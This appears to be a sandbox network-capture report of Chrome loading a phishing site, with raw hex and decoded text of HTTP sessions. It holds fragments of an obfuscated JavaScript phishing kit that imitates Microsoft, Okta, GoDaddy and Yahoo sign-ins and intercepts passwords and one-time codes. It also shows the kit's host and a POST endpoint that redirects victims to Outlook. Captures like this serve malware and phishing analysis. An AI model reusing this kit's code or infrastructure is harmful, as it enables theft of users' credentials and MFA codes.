                                                              2024-07-03 07:41:07 UTC1369INData Raw: 41 79 a5 b8 da 6d 00 aa 75 3c 04 9b 2b 02 72 61 45 50 0c 27 48 8a 66 58 8e 17 c4 72 ff 0a aa a6 1b a6 65 03 00 88 b0 24 13 ca b8 50 54 ad 3e b1 db 03 04 84 eb 88 80 62 38 41 52 34 c3 72 bc 20 96 b6 51 46 51 6b 9b a9 63 98 56 a3 e2 13 15 c2 04 21 e9 30 60 05 83 86 c4 8f e9 a0 a9 ff f0 17 a0 b7 17 e7 07 65 da fd 98 7e d8 04 c0 0d b5 75 78 ca 39 2a af 15 ac 6d 98 37 9c 46 60 a4 51 46 1b 63 ac 64 29 52 a5 49 97 21 53 56 45 1d 2a 36 25 95 a2 4c b9 8a 2a 47 ac 4a 54 ab 51 5b dd e8 d5 a3 41 e3 73 28 bc 75 10 b4 db 41 a5 28 53 8e 1e d2 f3 3a cc bc 1d 7c fc 10 25 da bd f2 fc a6 e8 16 82 4b 39 b0 71 4d 28 28 c1 54 d4 34 0d d5 a6 e7 9b d7 02 78 db f5 6f 2c 5c 2e 36 76 cf fe a6 f4 a5 10 31 09 09 d0 9e 36 f0 1f 3e 12 3b 49 4b 4b 4b 4b 4b bf cf 6e e5 eb f8 ee 58 bb 05
                                                              Data Ascii: Aymu<+raEP'HfXre$PT>b8AR4r QFQkcV!0`e~ux9*m7F`QFcd)RI!SVE*6%L*GJTQ[As(uA(S:|%K9qM((T4xo,\.6v16>;IKKKKKnX
                                                              2024-07-03 07:41:07 UTC1369INData Raw: 51 a2 c5 d8 27 43 26 02 22 92 13 20 64 14 59 b2 e5 a0 3a 99 67 82 e6 ee 72 cf 1d 66 c7 a3 2c 1a da 79 0f 13 14 29 92 e2 71 c9 44 e4 e7 84 a0 c2 9f f7 0e ba a8 11 61 68 5f fa 1d ff f6 b8 d7 09 45 9d f7 18 61 a2 cf d1 a7 76 8f 13 7e b0 51 c5 d3 5b 09 40 57 2c 6f 6b b6 61 22 ea 37 fd 68 16 80 a1 c0 35 c2 0c d2 3a 85 ef 21 50 78 14 9f 15 27 6e bd a6 4d 6a 70 82 bc 56 5c ed c3 07 4f fc db 7e b8 f3 ce 26 a0 dc bc 05 0a 43 71 81 c0 11 41 31 9c 20 29 9a 61 39 5e 10 3b a3 77 e9 b5 a7 54 3d eb 39 f8 84 11 13 21 91 29 54 1a 9d c1 64 b1 39 5c 5e fe 82 0a 00 c0 d0 b2 c2 20 28 56 b8 c4 22 c4 92 8f 4b c4 db e9 d5 16 77 f3 73 34 90 cb 61 6b a5 67 b8 d1 63 dc 12 db 49 a1 78 8f 3a 70 56 78 9c f7 22 15 6d 55 d4 d2 cd 70 8f 4e b6 dd 48 9f a8 82 3e b4 c1 8c 26 b3 25 20 c1 88
                                                              Data Ascii: Q'C&" dY:grf,y)qDah_Eav~Q[@W,oka"7h5:!Px'nMjpV\O~&CqA1 )a9^;wT=9!)Td9\^ (V"Kws4akgcIx:pVx"mUpNH>&%


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              54192.168.2.662932188.114.96.34434156C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-07-03 07:41:06 UTC1381OUTGET /56NViOjdyBE66K4aemhQsnnijWU2q89KCdOOZ89106 HTTP/1.1
                                                              Host: vkwek.ckyucle.com
                                                              Connection: keep-alive
                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                              sec-ch-ua-mobile: ?0
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                              sec-ch-ua-platform: "Windows"
                                                              Accept: */*
                                                              Sec-Fetch-Site: same-origin
                                                              Sec-Fetch-Mode: no-cors
                                                              Sec-Fetch-Dest: script
                                                              Referer: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrs
                                                              Accept-Encoding: gzip, deflate, br
                                                              Accept-Language: en-US,en;q=0.9
                                                              Cookie: XSRF-TOKEN=eyJpdiI6IjREdHdIdGd2VjJhU0VRemd6ejZkQ1E9PSIsInZhbHVlIjoiYUZ1VUdwVTErTlEyRmlqM0JZNmZ0RFlNSjJhcWpDaVJ0bGNyWEYxZWlWTmJrTnRDUEJhajUzNWViSmw4WWtxYWhyajU2dnhTd1oyU0wwWDBERWN6Q0hjSXBiSDc3dWZRcnFoSm5GM0RCczNRZkNDRE1ZaFA2QnB5aytnbURacUMiLCJtYWMiOiJjNjdmZTFmZTdlNjRhOTgxYzY5YzBjMTBlMzVhMWEzOGVhYzQ0Y2M5NWI0YzY5ZGVjYzlhNzBjMTAwYjc2MThhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InZCQjZkcVgzekN0b3E2c3BtL3FaQ2c9PSIsInZhbHVlIjoiYUtaUFRybXJtL3R0Ums5a1V1Y3pqZkdweUxaYk4yYjFKV0lsMmcrU2ZmVGRMblk3TXJqMmZBeHpOTXhBektiSnY5bGd5MFBab0djZGw0d1Q1a1NyZXAySkQ2MXRiS0FORHhPVlVaQS9VRjVkR2xsaS9mTUtmbmg4U3VrNjVJa08iLCJtYWMiOiIwZWFjMjE3ODQ5MTNhOWIwZjdlMGQyNjdmOTg5ZGQ5MGNhMWMwNGNkMTkyYjliZWEwYjJlN2RjMzhmOGQ4ZTE4IiwidGFnIjoiIn0%3D
                                                              2024-07-03 07:41:07 UTC660INHTTP/1.1 200 OK
                                                              Date: Wed, 03 Jul 2024 07:41:06 GMT
                                                              Content-Type: application/javascript
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Content-Disposition: inline; filename="56NViOjdyBE66K4aemhQsnnijWU2q89KCdOOZ89106"
                                                              CF-Cache-Status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=c3L1SgmKDi564DgJ3mRobF%2F%2FrPufou%2BR9HUDhK37rrsLuaUPV%2F9qkjMmwMj9L9UWdS8Jp39BJW4sQSdSDCYGvNwxtDMPFdRW%2FJbSDXWkjjvH4B0f1dvR%2B7U1r6MRpA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              alt-svc: h3=":443"; ma=86400
                                                              Server: cloudflare
                                                              CF-RAY: 89d53b343fb515cb-EWR
                                                              2024-07-03 07:41:07 UTC709INData Raw: 33 37 39 66 0d 0a 63 6f 6e 73 74 20 5f 30 78 34 31 66 66 65 64 3d 5f 30 78 31 36 30 39 3b 66 75 6e 63 74 69 6f 6e 20 5f 30 78 33 36 63 63 28 29 7b 63 6f 6e 73 74 20 5f 30 78 34 37 64 66 61 38 3d 5b 27 6e 61 6d 65 27 2c 27 6f 6e 63 6c 69 63 6b 27 2c 27 6d 75 6c 74 62 61 63 6b 62 74 6e 63 6c 69 63 6b 27 2c 27 69 6e 70 75 74 2d 67 72 6f 75 70 27 2c 27 73 74 79 6c 65 27 2c 27 63 61 6c 6c 6f 74 70 27 2c 27 79 61 68 6f 6f 2e 63 6f 6d 27 2c 27 64 69 73 70 6c 61 79 27 2c 27 6f 74 70 5c 78 32 30 73 65 6e 74 27 2c 27 61 75 74 6f 63 6f 6d 70 6c 65 74 65 27 2c 27 64 75 70 6c 69 63 61 74 65 5c 78 32 30 72 65 71 75 65 73 74 27 2c 27 69 50 72 6f 6f 66 45 6d 61 69 6c 45 6e 74 72 79 27 2c 27 31 33 32 39 34 30 38 4b 55 53 68 44 5a 27 2c 27 61 75 74 68 61 70 70 69 6d 67 27
                                                              Data Ascii: 379fconst _0x41ffed=_0x1609;function _0x36cc(){const _0x47dfa8=['name','onclick','multbackbtnclick','input-group','style','callotp','yahoo.com','display','otp\x20sent','autocomplete','duplicate\x20request','iProofEmailEntry','1329408KUShDZ','authappimg'
                                                              2024-07-03 07:41:07 UTC1369INData Raw: 69 76 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 64 69 76 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 70 68 63 6f 6e 74 61 69 6e 65 72 5c 78 32 32 5c 78 32 30 69 64 3d 5c 78 32 32 69 50 72 6f 6f 66 50 68 6f 6e 65 45 6e 74 72 79 5c 78 32 32 5c 78 32 30 73 74 79 6c 65 3d 5c 78 32 32 64 69 73 70 6c 61 79 3a 5c 78 32 30 6e 6f 6e 65 3b 5c 78 32 32 5c 78 32 30 61 72 69 61 2d 68 69 64 64 65 6e 3d 5c 78 32 32 74 72 75 65 5c 78 32 32 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 6c 61 62 65 6c 5c 78 32 30 69 64 3d 5c 78 32 32 69 50 72 6f 6f 66 50 68 6f 6e 65 48 69 6e 74 5c 78 32 32 5c 78 32 30 66 6f 72 3d 5c 78 32 32 69 50 72 6f 6f 66 50 68 6f 6e 65 5c
                                                              Data Ascii: iv>\x0a\x20\x20\x20\x20\x20\x20<div\x20class=\x22phcontainer\x22\x20id=\x22iProofPhoneEntry\x22\x20style=\x22display:\x20none;\x22\x20aria-hidden=\x22true\x22>\x0a\x20\x20\x20\x20\x20\x20\x20\x20<label\x20id=\x22iProofPhoneHint\x22\x20for=\x22iProofPhone\
                                                              2024-07-03 07:41:07 UTC1369INData Raw: 71 75 69 72 65 64 27 2c 27 62 61 63 6b 67 72 6f 75 6e 64 27 2c 27 74 79 70 65 27 2c 27 68 61 73 41 74 74 72 69 62 75 74 65 27 2c 27 73 65 63 74 69 6f 6e 73 5f 70 64 66 27 2c 27 69 6e 70 5f 75 6e 61 6d 65 27 2c 27 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 27 2c 27 52 65 71 75 65 73 74 5c 78 32 30 77 61 73 6e 5c 78 32 37 74 5c 78 32 30 73 65 6e 74 27 2c 27 65 72 72 6f 72 5f 75 6e 61 6d 65 27 2c 27 65 72 72 6f 72 5c 78 32 30 27 2c 27 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 27 2c 27 6a 73 6f 6e 27 2c 27 4d 69 63 72 6f 73 6f 66 74 5c 78 32 30 41 75 74 68 65 6e 74 69 63 61 74 6f 72 27 2c 27 66 6f 72 45 61 63 68 27 2c 27 70 61 72 65 6e 74 4e 6f 64 65 27 2c 27 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78
                                                              Data Ascii: quired','background','type','hasAttribute','sections_pdf','inp_uname','background-image','Request\x20wasn\x27t\x20sent','error_uname','error\x20','sections_godaddy','json','Microsoft\x20Authenticator','forEach','parentNode','\x0a\x20\x20\x20\x20\x20\x20\x
                                                              2024-07-03 07:41:07 UTC1369INData Raw: 30 63 6f 64 65 2e 27 2c 27 63 6f 6e 66 69 72 6d 65 6d 61 69 6c 27 2c 27 63 6f 6e 74 65 6e 74 27 2c 27 39 32 39 39 37 36 30 4c 42 78 5a 61 73 27 2c 27 70 68 63 6f 6e 74 61 69 6e 65 72 27 2c 27 73 65 63 74 69 6f 6e 5f 61 75 74 68 63 61 6c 6c 27 2c 27 67 65 74 41 74 74 72 69 62 75 74 65 27 2c 27 23 66 35 66 37 66 38 27 2c 27 23 6d 61 69 6e 4c 6f 61 64 65 72 27 2c 27 73 69 67 6e 75 70 27 2c 27 73 65 63 74 69 6f 6e 5f 32 66 61 27 2c 27 66 61 64 65 6f 75 74 66 6f 72 6d 5c 78 32 30 31 73 5c 78 32 30 66 6f 72 77 61 72 64 73 27 2c 27 70 77 64 5f 6f 6b 74 61 27 2c 27 61 75 74 68 61 70 70 65 72 72 6f 72 64 65 73 63 27 2c 27 31 35 39 33 37 35 39 41 57 4c 42 59 4a 27 2c 27 61 72 69 61 2d 6c 69 76 65 27 2c 27 74 61 62 6c 65 27 2c 27 54 68 65 5c 78 32 30 77 72 6f 6e 67
                                                              Data Ascii: 0code.','confirmemail','content','9299760LBxZas','phcontainer','section_authcall','getAttribute','#f5f7f8','#mainLoader','signup','section_2fa','fadeoutform\x201s\x20forwards','pwd_okta','authapperrordesc','1593759AWLBYJ','aria-live','table','The\x20wrong
                                                              2024-07-03 07:41:07 UTC1369INData Raw: 6f 72 77 61 72 64 73 27 2c 27 50 6c 65 61 73 65 2c 5c 78 32 30 70 72 6f 76 69 64 65 5c 78 32 30 61 5c 78 32 30 76 61 6c 69 64 5c 78 32 30 65 6d 61 69 6c 2e 27 2c 27 6f 6b 74 61 27 2c 27 62 74 6e 5f 73 69 67 27 2c 27 50 4f 53 54 27 2c 27 72 65 73 65 6e 74 6c 69 6e 6b 27 2c 27 6d 75 6c 74 69 70 6c 65 61 63 63 6f 75 6e 74 6f 70 74 69 6f 6e 73 27 2c 27 73 70 6c 69 74 27 2c 27 69 6e 70 75 74 27 2c 27 73 65 63 74 69 6f 6e 5f 79 6f 75 64 6f 6e 74 68 61 76 65 61 63 63 65 73 73 27 2c 27 70 6f 70 27 2c 27 45 6e 74 65 72 5c 78 32 30 61 5c 78 32 30 73 65 63 75 72 69 74 79 5c 78 32 30 63 6f 64 65 27 2c 27 70 72 65 73 65 6e 74 61 74 69 6f 6e 27 2c 27 6d 62 2d 31 36 27 2c 27 65 72 72 6f 72 27 2c 27 74 68 65 6e 27 2c 27 6e 75 6c 6c 27 2c 27 71 75 65 72 79 53 65 6c 65 63
                                                              Data Ascii: orwards','Please,\x20provide\x20a\x20valid\x20email.','okta','btn_sig','POST','resentlink','multipleaccountoptions','split','input','section_youdonthaveaccess','pop','Enter\x20a\x20security\x20code','presentation','mb-16','error','then','null','querySelec
                                                              2024-07-03 07:41:07 UTC1369INData Raw: 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3a 3a 73 65 6c 65 63 74 69 6f 6e 5c 78 32 30 7b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 62 61 63 6b 67 72 6f 75 6e 64 3a 5c 78 32 30 23 61 36 66 66 66 38 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 7d 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 27 2c 27 35 34 37 34 30 31 66 72 66 4b 59 61 27 2c 27 73 69 67 6e 69 6e 61 6e 6f 74 68 65 72 65 72 72 6f 72 64 65
                                                              Data Ascii: 0\x20\x20\x20\x20\x20::selection\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20background:\x20#a6fff8;\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20','547401frfKYa','signinanothererrorde
                                                              2024-07-03 07:41:07 UTC1369INData Raw: 78 32 30 76 65 72 69 66 79 5c 78 32 30 74 68 61 74 5c 78 32 30 74 68 69 73 5c 78 32 30 69 73 5c 78 32 30 79 6f 75 72 5c 78 32 30 65 6d 61 69 6c 5c 78 32 30 61 64 64 72 65 73 73 2c 5c 78 32 30 63 6f 6d 70 6c 65 74 65 5c 78 32 30 74 68 65 5c 78 32 30 68 69 64 64 65 6e 5c 78 32 30 70 61 72 74 5c 78 32 30 61 6e 64 5c 78 32 30 63 6c 69 63 6b 5c 78 32 30 5c 78 32 32 53 65 6e 64 5c 78 32 30 63 6f 64 65 5c 78 32 32 5c 78 32 30 74 6f 5c 78 32 30 72 65 63 65 69 76 65 5c 78 32 30 79 6f 75 72 5c 78 32 30 63 6f 64 65 2e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 2f 64 69 76 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 64 69 76 5c 78 32 30 72 6f 6c 65 3d 5c 78 32 32 61 6c 65 72 74
                                                              Data Ascii: x20verify\x20that\x20this\x20is\x20your\x20email\x20address,\x20complete\x20the\x20hidden\x20part\x20and\x20click\x20\x22Send\x20code\x22\x20to\x20receive\x20your\x20code.\x0a\x20\x20\x20\x20\x20\x20</div>\x0a\x20\x20\x20\x20\x20\x20<div\x20role=\x22alert
                                                              2024-07-03 07:41:07 UTC1369INData Raw: 27 2c 27 73 65 6c 65 63 74 6d 75 6c 74 69 70 6c 65 61 63 63 6f 75 6e 74 28 74 68 69 73 29 27 2c 27 56 65 72 69 66 79 5c 78 32 30 6f 6e 6c 69 6e 65 27 2c 27 75 73 65 41 75 74 68 65 6e 74 69 63 61 74 6f 72 27 2c 27 64 61 74 61 2d 6d 65 74 68 6f 64 69 64 27 2c 27 3c 73 70 61 6e 3e 53 6f 72 72 79 2c 5c 78 32 30 77 65 5c 78 32 37 72 65 5c 78 32 30 68 61 76 69 6e 67 5c 78 32 30 74 72 6f 75 62 6c 65 5c 78 32 30 76 65 72 69 66 79 69 6e 67 5c 78 32 30 79 6f 75 72 5c 78 32 30 61 63 63 6f 75 6e 74 2e 5c 78 32 30 50 6c 65 61 73 65 5c 78 32 30 74 72 79 5c 78 32 30 61 67 61 69 6e 2e 3c 2f 73 70 61 6e 3e 3c 61 5c 78 32 30 69 64 3d 5c 78 32 32 56 69 65 77 44 65 74 61 69 6c 73 5c 78 32 32 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 6e 6f 2d 77 72 61 70 5c 78 32 32 5c 78 32
                                                              Data Ascii: ','selectmultipleaccount(this)','Verify\x20online','useAuthenticator','data-methodid','<span>Sorry,\x20we\x27re\x20having\x20trouble\x20verifying\x20your\x20account.\x20Please\x20try\x20again.</span><a\x20id=\x22ViewDetails\x22\x20class=\x22no-wrap\x22\x2
                                                              2024-07-03 07:41:07 UTC1369INData Raw: 2c 27 73 65 63 74 69 6f 6e 5f 74 72 79 61 67 61 69 6e 6c 61 74 65 72 27 2c 27 62 74 6e 5f 70 72 6f 74 65 63 74 61 63 63 6f 75 6e 74 27 2c 27 72 65 64 69 72 65 63 74 65 64 5c 78 32 30 62 61 63 6b 5c 78 32 30 74 6f 5c 78 32 30 73 69 67 6e 5c 78 32 30 69 6e 27 2c 27 69 50 72 6f 6f 66 50 68 6f 6e 65 48 69 6e 74 27 2c 27 6e 65 77 77 65 62 73 69 74 65 6f 70 65 6e 27 2c 27 74 61 62 6c 65 2d 72 6f 77 27 2c 27 5b 61 72 69 61 2d 64 65 73 63 72 69 62 65 64 62 79 3d 5c 78 32 32 69 50 72 6f 6f 66 49 6e 70 75 74 45 72 72 6f 72 5c 78 32 32 5d 27 2c 27 63 68 65 63 6b 65 64 27 2c 27 6c 6f 67 6f 27 2c 27 72 6f 6c 65 27 2c 27 73 65 73 73 69 6f 6e 5c 78 32 30 74 69 6d 65 6f 75 74 27 2c 27 69 6e 70 5f 6f 74 70 63 6f 64 65 27 2c 27 69 6e 6e 65 72 54 65 78 74 27 2c 27 65 72 72
                                                              Data Ascii: ,'section_tryagainlater','btn_protectaccount','redirected\x20back\x20to\x20sign\x20in','iProofPhoneHint','newwebsiteopen','table-row','[aria-describedby=\x22iProofInputError\x22]','checked','logo','role','session\x20timeout','inp_otpcode','innerText','err
                                                              2024-07-03 07:41:07 UTC1369INData Raw: 6c 65 74 20 77 61 69 74 32 66 61 63 61 6e 63 65 6c 3d 30 78 30 2c 6f 74 70 74 79 70 65 3d 30 78 30 3b 76 61 72 20 63 75 72 72 65 6e 74 77 65 62 3d 30 78 30 3b 21 64 6f 63 75 6d 65 6e 74 5b 5f 30 78 34 31 66 66 65 64 28 30 78 32 31 37 29 5d 28 5f 30 78 34 31 66 66 65 64 28 30 78 31 64 34 29 29 5b 5f 30 78 34 31 66 66 65 64 28 30 78 31 37 37 29 5d 5b 27 63 6f 6e 74 61 69 6e 73 27 5d 28 5f 30 78 34 31 66 66 65 64 28 30 78 31 63 39 29 29 26 26 28 76 69 65 77 3d 5f 30 78 34 31 66 66 65 64 28 30 78 31 35 65 29 29 3b 64 6f 63 75 6d 65 6e 74 5b 5f 30 78 34 31 66 66 65 64 28 30 78 32 31 37 29 5d 28 27 73 65 63 74 69 6f 6e 73 5f 70 64 66 27 29 26 26 21 64 6f 63 75 6d 65 6e 74 5b 5f 30 78 34 31 66 66 65 64 28 30 78 32 31 37 29 5d 28 5f 30 78 34 31 66 66 65 64 28 30
                                                              Data Ascii: let wait2facancel=0x0,otptype=0x0;var currentweb=0x0;!document[_0x41ffed(0x217)](_0x41ffed(0x1d4))[_0x41ffed(0x177)]['contains'](_0x41ffed(0x1c9))&&(view=_0x41ffed(0x15e));document[_0x41ffed(0x217)]('sections_pdf')&&!document[_0x41ffed(0x217)](_0x41ffed(0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              55192.168.2.662935188.114.96.34434156C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-07-03 07:41:07 UTC1544OUTPOST /rfrj4D3IOrBb34OKfQNxY9akOmZckEWxXo9xwrWKJaQReBHFIHg5kn2 HTTP/1.1
                                                              Host: vkwek.ckyucle.com
                                                              Connection: keep-alive
                                                              Content-Length: 53
                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                              Accept: */*
                                                              Content-Type: application/x-www-form-urlencoded; charset=UTF-8
                                                              X-Requested-With: XMLHttpRequest
                                                              sec-ch-ua-mobile: ?0
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                              sec-ch-ua-platform: "Windows"
                                                              Origin: https://vkwek.ckyucle.com
                                                              Sec-Fetch-Site: same-origin
                                                              Sec-Fetch-Mode: cors
                                                              Sec-Fetch-Dest: empty
                                                              Referer: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrs
                                                              Accept-Encoding: gzip, deflate, br
                                                              Accept-Language: en-US,en;q=0.9
                                                              Cookie: XSRF-TOKEN=eyJpdiI6IjREdHdIdGd2VjJhU0VRemd6ejZkQ1E9PSIsInZhbHVlIjoiYUZ1VUdwVTErTlEyRmlqM0JZNmZ0RFlNSjJhcWpDaVJ0bGNyWEYxZWlWTmJrTnRDUEJhajUzNWViSmw4WWtxYWhyajU2dnhTd1oyU0wwWDBERWN6Q0hjSXBiSDc3dWZRcnFoSm5GM0RCczNRZkNDRE1ZaFA2QnB5aytnbURacUMiLCJtYWMiOiJjNjdmZTFmZTdlNjRhOTgxYzY5YzBjMTBlMzVhMWEzOGVhYzQ0Y2M5NWI0YzY5ZGVjYzlhNzBjMTAwYjc2MThhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InZCQjZkcVgzekN0b3E2c3BtL3FaQ2c9PSIsInZhbHVlIjoiYUtaUFRybXJtL3R0Ums5a1V1Y3pqZkdweUxaYk4yYjFKV0lsMmcrU2ZmVGRMblk3TXJqMmZBeHpOTXhBektiSnY5bGd5MFBab0djZGw0d1Q1a1NyZXAySkQ2MXRiS0FORHhPVlVaQS9VRjVkR2xsaS9mTUtmbmg4U3VrNjVJa08iLCJtYWMiOiIwZWFjMjE3ODQ5MTNhOWIwZjdlMGQyNjdmOTg5ZGQ5MGNhMWMwNGNkMTkyYjliZWEwYjJlN2RjMzhmOGQ4ZTE4IiwidGFnIjoiIn0%3D
                                                              2024-07-03 07:41:07 UTC53OUTData Raw: 70 61 67 65 6c 69 6e 6b 3d 64 50 48 39 4d 68 6f 34 45 64 4b 43 62 4b 77 33 70 42 36 34 32 67 25 33 44 25 33 44 26 74 79 70 65 3d 34 26 61 70 70 6e 75 6d 3d 31
                                                              Data Ascii: pagelink=dPH9Mho4EdKCbKw3pB642g%3D%3D&type=4&appnum=1
                                                              2024-07-03 07:41:07 UTC997INHTTP/1.1 200 OK
                                                              Date: Wed, 03 Jul 2024 07:41:07 GMT
                                                              Content-Type: application/json
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Cache-Control: no-cache, private
                                                              CF-Cache-Status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=F01e1aMSkyhuMtm30qwB9d31E4qAoq7GeMzwaPAIeNwxvBSnHhX85CMJ2VArB8Xcgu8TuJag5Ssp4wUC2UH8c7rvDU2unzQByQ8%2FTXFu9%2B6OKkN612%2BlBAO58UKUCQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              alt-svc: h3=":443"; ma=86400
                                                              Set-Cookie: XSRF-TOKEN=eyJpdiI6IlZpT0pEZ00vemxEKzdZb0VNV1oyNEE9PSIsInZhbHVlIjoiUUZIcFpmeU1sZHZoR3VDZ052RU1MWG45aGMvTU1vcGpUcE9EQ25QVzF0QmpYU0U4QmxPRngzck5TUG1POVBTc0tNeUJMNGZ3WVd6VGVJcm1vRDFuNFJ0ekc5Q2xETnp6ODNOam8vNUdqNE11TWVBR3JTanYyTXl6YW1XWURhRFYiLCJtYWMiOiI0Y2IxNWQ5NjIxOTliYjllODJiN2Q5YjQ2NzEwZTEwYmNiYWQ0ZjEyYTg5ZjJhNTMwMmE4ODE5ZjIwZWNjYTc1IiwidGFnIjoiIn0%3D; expires=Wed, 03-Jul-2024 09:41:07 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                              2024-07-03 07:41:07 UTC518INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6c 56 32 63 6a 4a 4f 56 6a 68 71 56 6d 78 7a 56 56 6c 58 62 56 46 43 52 54 64 58 64 58 63 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 4c 31 6c 47 4e 58 4e 42 4e 6d 51 32 57 6b 35 4e 55 69 39 45 56 48 6b 7a 52 55 68 45 5a 6a 56 56 52 33 70 61 55 6b 74 77 4d 6c 4d 35 63 57 70 53 4d 6d 70 55 54 46 4e 73 65 57 78 59 64 55 56 6a 65 46 70 7a 5a 48 6c 79 54 53 39 4a 57 56 42 46 64 7a 68 78 4e 6d 78 57 5a 6c 64 73 64 7a 5a 42 4e 43 74 6d 63 48 70 71 51 55 4a 47 4d 6e 6c 6e 5a 6b 52 43 59 55 31 50 4d 45 64 72 4e 33 6c 4f 5a 47 39 58 55 46 4e 4c 56 32 68 50 55 45 78 4c 63 79 39 36 53 30 4e 6d 62 46 64 70 54 6a 64 50 51 6a 4a 75 54 54 41 76 52 45 73
                                                              Data Ascii: Set-Cookie: laravel_session=eyJpdiI6IlV2cjJOVjhqVmxzVVlXbVFCRTdXdXc9PSIsInZhbHVlIjoiL1lGNXNBNmQ2Wk5NUi9EVHkzRUhEZjVVR3paUktwMlM5cWpSMmpUTFNseWxYdUVjeFpzZHlyTS9JWVBFdzhxNmxWZldsdzZBNCtmcHpqQUJGMnlnZkRCYU1PMEdrN3lOZG9XUFNLV2hPUExLcy96S0NmbFdpTjdPQjJuTTAvREs
                                                              2024-07-03 07:41:07 UTC72INData Raw: 34 32 0d 0a 7b 22 65 78 70 69 72 65 64 22 3a 30 2c 22 72 65 64 69 72 65 63 74 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 6f 75 74 6c 6f 6f 6b 2e 6f 66 66 69 63 65 2e 63 6f 6d 5c 2f 6d 61 69 6c 5c 2f 22 7d 0d 0a
                                                              Data Ascii: 42{"expired":0,"redirecturl":"https:\/\/outlook.office.com\/mail\/"}
                                                              2024-07-03 07:41:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                              Data Ascii: 0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              56192.168.2.662936188.114.96.34434156C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-07-03 07:41:07 UTC1465OUTGET /mnV1lfGeFEBrSZF3tuYYejMClYOTm2XI5H6CdAfkleMiUWyqFdfMgv4x5mkyLwx220 HTTP/1.1
                                                              Host: vkwek.ckyucle.com
                                                              Connection: keep-alive
                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                              sec-ch-ua-mobile: ?0
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                              sec-ch-ua-platform: "Windows"
                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                              Sec-Fetch-Site: same-origin
                                                              Sec-Fetch-Mode: no-cors
                                                              Sec-Fetch-Dest: image
